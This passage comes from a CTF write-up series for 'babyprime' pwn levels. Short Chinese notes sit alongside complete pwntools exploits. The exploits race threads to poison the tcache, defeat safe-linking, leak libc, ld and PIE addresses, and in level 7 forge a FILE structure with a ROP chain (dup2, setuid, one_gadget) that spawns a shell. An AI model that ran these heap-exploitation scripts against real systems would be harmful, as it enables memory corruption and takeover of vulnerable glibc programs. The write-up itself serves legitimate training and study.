HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def printf(tid, idx):
    thread[tid].sendline(f"printf {idx}".encode())


def malloc(tid, idx):
    thread[tid].sendline(f"malloc {idx}".encode())


def scanf(tid, idx, content):
    thread[tid].sendline(f"scanf {idx} {content}".encode())


def free(tid, idx):
    thread[tid].sendline(f"free {idx}".encode())


def send_flag(tid, secret):
    thread[tid].sendline(b"send_flag")
    thread[tid].sendlineafter(b"Secret: ", secret)


def quit(tid):
    thread[tid].sendline(b"quit")


def arbitrary_read(addr):
    while True:
        thread[0].send((b"malloc 0 free 0\n") * 10000)
        if os.fork() == 0:
            thread[1].send((b"scanf 0" + flat(addr) + b"\n") * 10000)
            os.kill(os.getpid(), 9)
        os.wait()

        malloc(0, 0)
        printf(0, 0)
        thread[0].recvuntil(b"MESSAGE: ")
        poisoned = int.from_bytes(thread[0].recvline().strip(), "little")

        if flat(poisoned) == flat(addr):
            break

    malloc(0, 1)
    printf(0, 1)

    thread[0].recvuntil(b"MESSAGE: ")
    return thread[0].recvline().strip()


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target, thread

    if args.L and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.L:
        target = process(FILE)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    malloc(0, 0)
    malloc(0, 1)
    free(0, 1)
    free(0, 0)
    malloc(0, 0)
    malloc(0, 1)

    printf(0, 0)
    thread[0].recvuntil(b"MESSAGE: ")
    heap = int.from_bytes(thread[0].recvline().strip(), "little")

    printf(0, 1)
    thread[0].recvuntil(b"MESSAGE: ")
    pos = int.from_bytes(thread[0].recvline().strip(), "little")
    heap = demangle(heap, pos)

    thread[0].success(f"pos: {hex(pos)}")
    thread[0].success(f"heap: {hex(heap)}")

    malloc(0, 0)
    malloc(0, 1)
    free(0, 1)
    free(0, 0)

    raw_input("DEBUG")
    secret = heap - 0x431
    secret = arbitrary_read(mangle(pos - 1, secret))
    thread[0].success(secret)

    send_flag(0, secret)
    quit(0)
    quit(1)

    thread[0].interactive()


if __name__ == "__main__":
    main()

Level 3

Information

Category: Pwn

Description

Create and use arbitrary read primitives to read from a thread's stack.

Write-up

这次分配到线程栈上去了，线程栈和 libc 有固定偏移，所以弄到 libc 就知道栈地址了。

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    context,
    flat,
    os,
    process,
    raw_input,
    remote,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")
args = parser.parse_args()


FILE = "/challenge/babyprime_level3.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def printf(tid, idx):
    thread[tid].sendline(f"printf {idx}".encode())


def malloc(tid, idx):
    thread[tid].sendline(f"malloc {idx}".encode())


def scanf(tid, idx, content):
    thread[tid].sendline(f"scanf {idx} {content}".encode())


def free(tid, idx):
    thread[tid].sendline(f"free {idx}".encode())


def send_flag(tid, secret):
    thread[tid].sendline(b"send_flag")
    thread[tid].sendlineafter(b"Secret: ", secret)


def quit(tid):
    thread[tid].sendline(b"quit")


def arbitrary_read(poison_idx, result_idx, addr):
    while True:
        thread[0].send((f"malloc {poison_idx} free {poison_idx}\n".encode()) * 10000)
        if os.fork() == 0:
            thread[1].send(
                (f"scanf {poison_idx}".encode() + flat(addr) + b"\n") * 10000
            )
            os.kill(os.getpid(), 9)
        os.wait()

        malloc(0, poison_idx)
        printf(0, poison_idx)
        thread[0].recvuntil(b"MESSAGE: ")
        poisoned = int.from_bytes(thread[0].recvline().strip(), "little")

        if flat(poisoned) == flat(addr):
            break

    malloc(0, result_idx)
    raw_input("DEBUG")
    printf(0, result_idx)

    thread[0].recvuntil(b"MESSAGE: ")
    return thread[0].recvline().strip()


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target, thread

    if args.L and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.L:
        target = process(FILE)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    malloc(0, 0)
    malloc(0, 1)
    free(0, 1)
    free(0, 0)
    malloc(0, 0)
    malloc(0, 1)

    printf(0, 0)
    thread[0].recvuntil(b"MESSAGE: ")
    heap = int.from_bytes(thread[0].recvline().strip(), "little")

    printf(0, 1)
    thread[0].recvuntil(b"MESSAGE: ")
    pos = int.from_bytes(thread[0].recvline().strip(), "little")
    heap = demangle(heap, pos)
    main_arena_ptr = heap - 0xAA1

    thread[0].success(f"pos: {hex(pos)}")
    thread[0].success(f"heap: {hex(heap)}")
    thread[0].success(f"main_arena_ptr: {hex(main_arena_ptr)}")

    malloc(0, 0)
    malloc(0, 1)
    free(0, 1)
    free(0, 0)

    libc.address = (
        int.from_bytes(arbitrary_read(0, 1, mangle(pos - 1, main_arena_ptr)), "little")
        - 0x219C80
    )
    secret = libc.address - 0x4740

    thread[0].success(f"libc: {hex(libc.address)}")
    thread[0].success(f"secret: {hex(secret)}")

    malloc(0, 2)
    malloc(0, 4)
    free(0, 4)
    free(0, 2)

    raw_input("DEBUG")
    secret = arbitrary_read(2, 4, mangle(pos, secret))

    send_flag(0, secret)
    quit(0)
    quit(1)

    thread[0].interactive()


if __name__ == "__main__":
    main()

Level 4

Information

Category: Pwn

Description

Create and use arbitrary read primitives to read from the .bss, now with PIE.

Write-up

注意权限问题，p2p 是你的好朋友。好啦，尽情去寻找虚拟内存地址空间中那块属于你的，闪闪发光的垃圾吧～

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    context,
    flat,
    os,
    process,
    raw_input,
    remote,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")
args = parser.parse_args()


FILE = "/challenge/babyprime_level4.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def printf(tid, idx):
    thread[tid].sendline(f"printf {idx}".encode())


def malloc(tid, idx):
    thread[tid].sendline(f"malloc {idx}".encode())


def scanf(tid, idx, content):
    thread[tid].sendline(f"scanf {idx} {content}".encode())


def free(tid, idx):
    thread[tid].sendline(f"free {idx}".encode())


def send_flag(tid, secret):
    thread[tid].sendline(b"send_flag")
    thread[tid].sendlineafter(b"Secret: ", secret)


def quit(tid):
    thread[tid].sendline(b"quit")


def arbitrary_read(poison_idx, result_idx, addr):
    BAD_BYTES = {b"\x20", b"\x0c", b"\x0a", b"\x0d", b"\x09", b"\x0b"}

    packed_addr = flat(addr)
    if any(bytes([byte]) in BAD_BYTES for byte in packed_addr):
        raise ValueError(
            f"Address {hex(addr)} contains a bad byte for scanf: {packed_addr.hex()}"
        )

    while True:
        thread[0].send((f"malloc {poison_idx} free {poison_idx}\n".encode()) * 10000)
        if os.fork() == 0:
            thread[1].send(
                (f"scanf {poison_idx}".encode() + flat(addr) + b"\n") * 10000
            )
            os.kill(os.getpid(), 9)
        os.wait()

        malloc(0, poison_idx)
        printf(0, poison_idx)
        thread[0].recvuntil(b"MESSAGE: ")
        poisoned = int.from_bytes(thread[0].recvline().strip(), "little")

        if flat(poisoned) == packed_addr:
            break

    raw_input("DEBUG")
    malloc(0, result_idx)
    printf(0, result_idx)

    thread[0].recvuntil(b"MESSAGE: ")
    return thread[0].recvline().strip()


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target, thread

    if args.L and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.L:
        target = process(FILE)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    malloc(0, 0)
    malloc(0, 1)
    free(0, 1)
    free(0, 0)
    malloc(0, 0)
    malloc(0, 1)

    printf(0, 0)
    thread[0].recvuntil(b"MESSAGE: ")
    heap = int.from_bytes(thread[0].recvline().strip(), "little")

    printf(0, 1)
    thread[0].recvuntil(b"MESSAGE: ")
    pos = int.from_bytes(thread[0].recvline().strip(), "little")
    heap = demangle(heap, pos)
    main_arena_ptr = heap - 0xAA1

    thread[0].success(f"pos: {hex(pos)}")
    thread[0].success(f"heap: {hex(heap)}")
    thread[0].success(f"main_arena_ptr: {hex(main_arena_ptr)}")

    raw_input("DEBUG")
    malloc(0, 0)
    malloc(0, 1)
    free(0, 1)
    free(0, 0)

    libc.address = (
        int.from_bytes(arbitrary_read(0, 1, mangle(pos - 1, main_arena_ptr)), "little")
        - 0x219C80
    )
    ld_ptr = libc.address + 0x219010

    thread[0].success(f"libc: {hex(libc.address)}")
    thread[0].success(f"ld_ptr: {hex(ld_ptr)}")

    raw_input("DEBUG")
    malloc(0, 2)
    malloc(0, 4)
    free(0, 4)
    free(0, 2)

    ld = int.from_bytes(arbitrary_read(2, 4, mangle(pos, ld_ptr)), "little") - 0x15C60
    pie_ptr = ld + 0x3B2F0

    thread[0].success(f"ld: {hex(ld)}")
    thread[0].success(f"pie_ptr: {hex(pie_ptr)}")

    raw_input("DEBUG")
    malloc(0, 3)
    malloc(0, 5)
    free(0, 5)
    free(0, 3)

    elf.address = (
        int.from_bytes(arbitrary_read(3, 5, mangle(pos, pie_ptr)), "little") - 0x4CA8
    )
    secret_ptr = elf.address + 0x53C0

    thread[0].success(f"pie: {hex(elf.address)}")
    thread[0].success(f"secret: {hex(secret_ptr)}")

    raw_input("DEBUG")
    malloc(0, 6)
    malloc(0, 7)
    free(0, 7)
    free(0, 6)

    secret = arbitrary_read(6, 7, mangle(pos, secret_ptr + 0x3))

    send_flag(0, secret)
    quit(0)
    quit(1)

    thread[0].interactive()


if __name__ == "__main__":
    main()

Level 5

Information

Category: Pwn

Description

Create and use arbitrary read primitives to read from the environment.

Write-up

探索探索内存，探探探就出来了。

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    context,
    flat,
    os,
    process,
    raw_input,
    remote,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")
args = parser.parse_args()


FILE = "/challenge/babyprime_level5.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def printf(tid, idx):
    thread[tid].sendline(f"printf {idx}".encode())


def malloc(tid, idx):
    thread[tid].sendline(f"malloc {idx}".encode())


def scanf(tid, idx, content):
    thread[tid].sendline(f"scanf {idx} {content}".encode())


def free(tid, idx):
    thread[tid].sendline(f"free {idx}".encode())


def send_flag(tid, secret):
    thread[tid].sendline(b"send_flag")
    thread[tid].sendlineafter(b"Secret: ", secret)


def quit(tid):
    thread[tid].sendline(b"quit")


def arbitrary_read(poison_idx, result_idx, addr):
    BAD_BYTES = {b"\x20", b"\x0c", b"\x0a", b"\x0d", b"\x09", b"\x0b"}

    packed_addr = flat(addr)
    if any(bytes([byte]) in BAD_BYTES for byte in packed_addr):
        raise ValueError(
            f"Address {hex(addr)} contains a bad byte for scanf: {packed_addr.hex()}"
        )

    while True:
        thread[0].send((f"malloc {poison_idx} free {poison_idx}\n".encode()) * 10000)
        if os.fork() == 0:
            thread[1].send(
                (f"scanf {poison_idx}".encode() + flat(addr) + b"\n") * 10000
            )
            os.kill(os.getpid(), 9)
        os.wait()

        malloc(0, poison_idx)
        printf(0, poison_idx)
        thread[0].recvuntil(b"MESSAGE: ")
        poisoned = int.from_bytes(thread[0].recvline().strip(), "little")

        if flat(poisoned) == packed_addr:
            break

    raw_input("DEBUG")
    malloc(0, result_idx)
    printf(0, result_idx)


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target, thread

    if args.L and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.L:
        target = process(FILE)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    malloc(0, 0)
    malloc(0, 1)
    free(0, 1)
    free(0, 0)
    malloc(0, 0)
    malloc(0, 1)

    printf(0, 0)
    thread[0].recvuntil(b"MESSAGE: ")
    heap = int.from_bytes(thread[0].recvline().strip(), "little")

    printf(0, 1)
    thread[0].recvuntil(b"MESSAGE: ")
    pos = int.from_bytes(thread[0].recvline().strip(), "little")
    heap = demangle(heap, pos)
    main_arena_ptr = heap - 0xAA1

    thread[0].success(f"pos: {hex(pos)}")
    thread[0].success(f"heap: {hex(heap)}")
    thread[0].success(f"main_arena_ptr: {hex(main_arena_ptr)}")

    raw_input("DEBUG")
    malloc(0, 0)
    malloc(0, 1)
    free(0, 1)
    free(0, 0)

    arbitrary_read(0, 1, mangle(pos - 1, main_arena_ptr))
    thread[0].recvuntil(b"MESSAGE: ")
    libc.address = int.from_bytes(thread[0].recvline().strip(), "little") - 0x219C80
    known_values = libc.address + 0x21AEC0

    thread[0].success(f"libc: {hex(libc.address)}")
    thread[0].success(f"known_values: {hex(known_values)}")

    raw_input("DEBUG")
    malloc(0, 2)
    malloc(0, 4)
    free(0, 4)
    free(0, 2)

    arbitrary_read(2, 4, mangle(pos, known_values))
    thread[0].recvuntil(b"MESSAGE: ")
    secret = int.from_bytes(thread[0].recv(0x6), "little") - 0x30

    thread[0].success(f"secret: {hex(secret)}")

    raw_input("DEBUG")
    malloc(0, 3)
    malloc(0, 5)
    free(0, 5)
    free(0, 3)

    arbitrary_read(3, 5, mangle(pos, secret + 0x10))
    thread[0].recvuntil(b"MESSAGE: ")
    secret = thread[0].recvline().strip()

    thread[0].success(f"secret: {secret}")

    send_flag(0, secret)
    quit(0)
    quit(1)

    thread[0].interactive()


if __name__ == "__main__":
    main()

Level 6

Information

Category: Pwn

Description

Create and use arbitrary read primitives to read from the main heap.

Write-up

培养内存侦查大头兵 ing……

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    context,
    flat,
    os,
    process,
    raw_input,
    remote,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")
args = parser.parse_args()


FILE = "/challenge/babyprime_level6.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def printf(tid, idx):
    thread[tid].sendline(f"printf {idx}".encode())


def malloc(tid, idx):
    thread[tid].sendline(f"malloc {idx}".encode())


def scanf(tid, idx, content):
    thread[tid].sendline(f"scanf {idx} {content}".encode())


def free(tid, idx):
    thread[tid].sendline(f"free {idx}".encode())


def send_flag(tid, secret):
    thread[tid].sendline(b"send_flag")
    thread[tid].sendlineafter(b"Secret: ", secret)


def quit(tid):
    thread[tid].sendline(b"quit")


def arbitrary_read(poison_idx, result_idx, addr):
    BAD_BYTES = {b"\x20", b"\x0c", b"\x0a", b"\x0d", b"\x09", b"\x0b"}

    packed_addr = flat(addr)
    if any(bytes([byte]) in BAD_BYTES for byte in packed_addr):
        raise ValueError(
            f"Address {hex(addr)} contains a bad byte for scanf: {packed_addr.hex()}"
        )

    while True:
        thread[0].send((f"malloc {poison_idx} free {poison_idx}\n".encode()) * 10000)
        if os.fork() == 0:
            thread[1].send(
                (f"scanf {poison_idx}".encode() + flat(addr) + b"\n") * 10000
            )
            os.kill(os.getpid(), 9)
        os.wait()

        malloc(0, poison_idx)
        printf(0, poison_idx)
        thread[0].recvuntil(b"MESSAGE: ")
        poisoned = int.from_bytes(thread[0].recvline().strip(), "little")

        if flat(poisoned) == packed_addr:
            break

    raw_input("DEBUG")
    malloc(0, result_idx)
    printf(0, result_idx)


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target, thread

    if args.L and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.L:
        target = process(FILE)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    malloc(0, 0)
    malloc(0, 1)
    free(0, 1)
    free(0, 0)
    malloc(0, 0)
    malloc(0, 1)

    printf(0, 0)
    thread[0].recvuntil(b"MESSAGE: ")
    heap = int.from_bytes(thread[0].recvline().strip(), "little")

    printf(0, 1)
    thread[0].recvuntil(b"MESSAGE: ")
    pos = int.from_bytes(thread[0].recvline().strip(), "little")
    heap = demangle(heap, pos)
    main_arena_ptr = heap - 0xAA1

    thread[0].success(f"pos: {hex(pos)}")
    thread[0].success(f"heap: {hex(heap)}")
    thread[0].success(f"main_arena_ptr: {hex(main_arena_ptr)}")

    raw_input("DEBUG")
    malloc(0, 0)
    malloc(0, 1)
    free(0, 1)
    free(0, 0)

    arbitrary_read(0, 1, mangle(pos - 1, main_arena_ptr))
    thread[0].recvuntil(b"MESSAGE: ")
    libc.address = int.from_bytes(thread[0].recvline().strip(), "little") - 0x219C80
    heap_ptr = libc.address + 0x219CE0

    thread[0].success(f"libc: {hex(libc.address)}")
    thread[0].success(f"heap_ptr: {hex(heap_ptr)}")

    raw_input("DEBUG")
    malloc(0, 2)
    malloc(0, 4)
    free(0, 4)
    free(0, 2)

    arbitrary_read(2, 4, mangle(pos, heap_ptr))
    thread[0].recvuntil(b"MESSAGE: ")
    heap = int.from_bytes(thread[0].recvline().strip(), "little")
    secret = heap - 0x2B0

    thread[0].success(f"heap: {hex(heap)}")
    thread[0].success(f"secret: {hex(secret)}")

    raw_input("DEBUG")
    malloc(0, 3)
    malloc(0, 5)
    free(0, 5)
    free(0, 3)

    arbitrary_read(3, 5, mangle(pos, secret))
    thread[0].recvuntil(b"MESSAGE: ")
    secret = thread[0].recvline().strip()

    thread[0].success(f"secret: {secret}")

    send_flag(0, secret)
    quit(0)
    quit(1)

    thread[0].interactive()


if __name__ == "__main__":
    main()

Level 7

Information

Category: Pwn

Description

Create and use arbitrary read/write primitives to obtain the flag.

Write-up

一开始被这个 flag_seed 函数迷惑了：

unsigned __int64 flag_seed()
{
  unsigned int seed; // [rsp+4h] [rbp-9Ch]
  unsigned int i; // [rsp+8h] [rbp-98h]
  int fd; // [rsp+Ch] [rbp-94h]
  _QWORD buf[17]; // [rsp+10h] [rbp-90h] BYREF
  unsigned __int64 v5; // [rsp+98h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  memset(buf, 0, 128);
  fd = open("/flag", 0);
  if ( fd < 0 )
    __assert_fail("fd >= 0", "/mnt/pwnshop/source.c", 0x2Bu, "flag_seed");
  if ( read(fd, buf, 0x80u) <= 0 )
    __assert_fail("read(fd, flag, 128) > 0", "/mnt/pwnshop/source.c", 0x2Cu, "flag_seed");
  seed = 0;
  for ( i = 0; i <= 0x1F; ++i )
    seed ^= *((_DWORD *)buf + (int)i);
  srand(seed);
  memset(buf, 0, 0x80u);
  return v5 - __readfsqword(0x28u);
}

注意到 open flag 之后并没有 close 那个 fd，并且下面那个 memset 清空了内存中的 flag，导致我的第一反应是想办法把 flag 读回内存……但又对 open 这种直接返回 file descriptor 的函数感到迷惑，不晓得如何将 flag 读出来……

后来问 AI，了解了 _IO_underflow 好像可以读文件，然后去改线程的 stdin，然并软。

我居然在最后浪费了差不多一天后才想到，我还可以尝试 getshell 啊，草！最后发现，one gadget 是正确执行了，但是没回显啊……再问 AI，得知 execve 会杀掉原进程的所有其它线程，当前执行 execve 的这个线程变成新进程的 main thread，并且只会继承 process-level 的资源，比如 fd table、cwd、environ、credentials 等，不会继承任何 thread-level 的东西。哦～这不就是 CSAPP fork 那课讲的吗，~~不好意思，记性不好（bushi~~

所以解决方法也很简单，直接 dup2 重定向一下 stdin 和 stdout 就好了。由于我们要 shell，所以 stderr 没啥用，况且子进程本来也没设置 stderr，直接忽视。

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    FileStructure,
    constants,
    context,
    flat,
    os,
    process,
    raw_input,
    remote,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")
args = parser.parse_args()


FILE = "/challenge/babyprime_level7.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def printf(tid, idx):
    thread[tid].sendline(f"printf {idx}".encode())


def malloc(tid, idx):
    thread[tid].sendline(f"malloc {idx}".encode())


def scanf(tid, idx, content):
    thread[tid].sendline(f"scanf {idx} {content}".encode())


def scanf_raw(tid, idx, content):
    thread[tid].sendline(f"scanf {idx} ".encode() + content)


def free(tid, idx):
    thread[tid].sendline(f"free {idx}".encode())


def quit(tid):
    thread[tid].sendline(b"quit")


def arbitrary_read(poison_idx, result_idx, addr):
    BAD_BYTES = {b"\x20", b"\x0c", b"\x0a", b"\x0d", b"\x09", b"\x0b"}

    packed_addr = flat(addr)
    if any(bytes([byte]) in BAD_BYTES for byte in packed_addr):
        raise ValueError(
            f"Address {hex(addr)} contains a bad byte for scanf: {packed_addr.hex()}"
        )

    while True:
        thread[0].send((f"malloc {poison_idx} free {poison_idx}\n".encode()) * 10000)
        if os.fork() == 0:
            thread[1].send(
                (f"scanf {poison_idx}".encode() + packed_addr + b"\n") * 10000
            )
            os.kill(os.getpid(), 9)
        os.wait()

        malloc(0, poison_idx)
        printf(0, poison_idx)
        thread[0].recvuntil(b"MESSAGE: ")
        poisoned = int.from_bytes(thread[0].recvline().strip(), "little")

        if flat(poisoned) == packed_addr:
            break

    raw_input("DEBUG")
    malloc(0, result_idx)
    printf(0, result_idx)


def arbitrary_write(poison_idx, result_idx, addr, content):
    arbitrary_read(poison_idx, result_idx, addr)
    raw_input("RAW SCANF")
    scanf_raw(0, result_idx, content)


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target, thread

    if args.L and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.L:
        target = process(FILE)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    malloc(0, 0)
    malloc(0, 1)
    free(0, 1)
    free(0, 0)
    malloc(0, 0)
    malloc(0, 1)

    printf(0, 0)
    thread[0].recvuntil(b"MESSAGE: ")
    heap = int.from_bytes(thread[0].recvline().strip(), "little")

    printf(0, 1)
    thread[0].recvuntil(b"MESSAGE: ")
    pos = int.from_bytes(thread[0].recvline().strip(), "little")
    heap = demangle(heap, pos)
    main_arena_ptr = heap - 0xAA1
    thread_stdout = heap - 0x5F1

    thread[0].success(f"pos: {hex(pos)}")
    thread[0].success(f"heap: {hex(heap)}")
    thread[0].success(f"main_arena_ptr: {hex(main_arena_ptr)}")
    thread[0].success(f"thread_stdout: {hex(thread_stdout)}")

    raw_input("DEBUG")
    malloc(0, 0)
    malloc(0, 1)
    free(0, 1)
    free(0, 0)

    arbitrary_read(0, 1, mangle(pos - 1, main_arena_ptr))
    thread[0].recvuntil(b"MESSAGE: ")
    libc.address = int.from_bytes(thread[0].recvline().strip(), "little") - 0x219C80
    heap_ptr = libc.address + 0x219CE0
    __GI__IO_wfile_overflow = libc.address + 0x215FE0

    thread[0].success(f"libc: {hex(libc.address)}")
    thread[0].success(f"heap_ptr: {hex(heap_ptr)}")
    thread[0].success(f"__GI__IO_wfile_overflow: {hex(__GI__IO_wfile_overflow)}")

    raw_input("DEBUG")
    malloc(0, 2)
    malloc(0, 4)
    free(0, 4)
    free(0, 2)

    arbitrary_read(2, 4, mangle(pos, heap_ptr))
    thread[0].recvuntil(b"MESSAGE: ")
    heap = int.from_bytes(thread[0].recvline().strip(), "little") - 0x530
    empty_buffer = heap + 0x1000

    thread[0].success(f"heap: {hex(heap)}")
    thread[0].success(f"empty_buffer: {hex(empty_buffer)}")

    raw_input("DEBUG")
    malloc(0, 3)
    malloc(0, 5)
    free(0, 5)
    free(0, 3)

    #   0x7fbcf9683b94 <_IO_wdoallocbuf+36>    mov    rax, qword ptr [rax + 0xe0]
    # ► 0x7fbcf9683b9b <_IO_wdoallocbuf+43>    call   qword ptr [rax + 0x68]

    leave_ret = libc.address + 0x4DA83
    pop_rdi_ret = libc.address + 0x2A3E5
    pop_rsi_ret = libc.address + 0x2BE51
    pop_rbp_ret = libc.address + 0x2A2E0
    pop_rax_ret = libc.address + 0x45EB0
    one_gadget = libc.address + 0xEBD43
    dup2 = libc.sym["dup2"]
    syscall_ret = libc.address + 0x91316

    payload = flat(
        {
            0x68: leave_ret,
            0xE0: empty_buffer,
            0xE8: pop_rdi_ret,
            0xF0: 5,
            0xF8: pop_rsi_ret,
            0x100: 0,
            0x108: dup2,
            0x110: pop_rsi_ret,
            0x118: 1,
            0x120: dup2,
            0x128: pop_rdi_ret,
            0x130: 0,
            0x138: pop_rax_ret,
            0x140: constants.SYS_setuid,
            0x148: syscall_ret,
            0x150: one_gadget,
        },
        filler=b"\x00",
    )
    arbitrary_write(3, 5, mangle(pos, empty_buffer), payload)

    raw_input("DEBUG")
    malloc(0, 6)
    malloc(0, 7)
    free(0, 7)
    free(0, 6)

    fp = FileStructure()
    fp._lock = heap + 0x2000
    fp._wide_data = empty_buffer
    fp.vtable = __GI__IO_wfile_overflow

    fp._IO_read_ptr = pop_rbp_ret
    fp._IO_read_end = heap + (0x1000 + 0xE8) - 0x8
    fp._IO_read_base = leave_ret

    arbitrary_write(6, 7, mangle(pos, thread_stdout + 0x3), bytes(fp))

    # thread[0].clean()
    printf(0, 0)

    thread[0].interactive()


if __name__ == "__main__":
    main()

Level 8

Information

Category: Pwn

Description

Create and use arbitrary read/write primitives to obtain the flag.

Write-up

笑死了，这回我学聪明了，鉴于这题的 description 和上题一样，而上题我写的 exp 又是拿 shell 的通解，且题目使用的 libc 版本都一样，我直接不看题，用上题的 exp 去跑，然后……通了！LMAO

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    FileStructure,
    constants,
    context,
    flat,
    os,
    process,
    raw_input,
    remote,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")
args = parser.parse_args()


FILE = "/challenge/babyprime_level8.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def printf(tid, idx):
    thread[tid].sendline(f"printf {idx}".encode())


def malloc(tid, idx):
    thread[tid].sendline(f"malloc {idx}".encode())


def scanf(tid, idx, content):
    thread[tid].sendline(f"scanf {idx} {content}".encode())


def scanf_raw(tid, idx, content):
    thread[tid].sendline(f"scanf {idx} ".encode() + content)


def free(tid, idx):
    thread[tid].sendline(f"free {idx}".encode())


def quit(tid):
    thread[tid].sendline(b"quit")


def arbitrary_read(poison_idx, result_idx, addr):
    BAD_BYTES = {b"\x20", b"\x0c", b"\x0a", b"\x0d", b"\x09", b"\x0b"}

    packed_addr = flat(addr)
    if any(bytes([byte]) in BAD_BYTES for byte in packed_addr):
        raise ValueError(
            f"Address {hex(addr)} contains a bad byte for scanf: {packed_addr.hex()}"
        )

    while True:
        thread[0].send((f"malloc {poison_idx} free {poison_idx}\n".encode()) * 10000)
        if os.fork() == 0:
            thread[1].send(
                (f"scanf {poison_idx}".encode() + packed_addr + b"\n") * 10000
            )
            os.kill(os.getpid(), 9)
        os.wait()

        malloc(0, poison_idx)
        printf(0, poison_idx)
        thread[0].recvuntil(b"MESSAGE: ")
        poisoned = int.from_bytes(thread[0].recvline().strip(), "little")

        if flat(poisoned) == packed_addr:
            break

    raw_input("DEBUG")
    malloc(0, result_idx)
    printf(0, result_idx)


def arbitrary_write(poison_idx, result_idx, addr, content):
    arbitrary_read(poison_idx, result_idx, addr)
    raw_input("RAW SCANF")
    scanf_raw(0, result_idx, content)


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target, thread

    if args.L and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.L:
        target = process(FILE)
    elif args.threads:
